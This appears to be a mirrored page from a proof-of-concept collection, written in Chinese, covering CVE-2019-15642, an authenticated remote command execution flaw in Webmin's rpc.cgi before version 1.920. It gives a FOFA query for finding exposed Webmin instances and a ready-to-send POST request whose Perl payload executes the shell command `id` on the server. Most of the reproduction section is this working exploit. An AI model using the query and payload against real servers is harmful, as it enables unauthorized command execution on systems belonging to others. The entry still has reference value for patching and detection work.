admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Webmin rpc.cgi 后台远程命令执行漏洞 CVE-2019-15642.md
Threekiii c0a2d6662b 更新漏洞库:Web应用漏洞/
2022-08-29 10:30:32 +08:00

34 lines
807 B
Markdown
Raw Blame History

# Webmin rpc.cgi 后台远程命令执行漏洞 CVE-2019-15642
## 漏洞描述
Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞。攻击者可借助特制的对象名称利用该漏洞执行代码。
## 漏洞影响
```
Webmin < 1.920
```
## FOFA
```
app="webmin"
```
## 漏洞复现
登录页面
![image-20220829101939637](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208291021846.png)
登录后发送请求包
```
POST /rpc.cgi
Referer: https://xxx.xxx.xxx.xxx/sysinfo.cgi?xnavigation=1
OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd=`id`;print "$cmd\n\n";
```
![image-20220829102134685](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208291021740.png)
Reference in New Issue View Git Blame Copy Permalink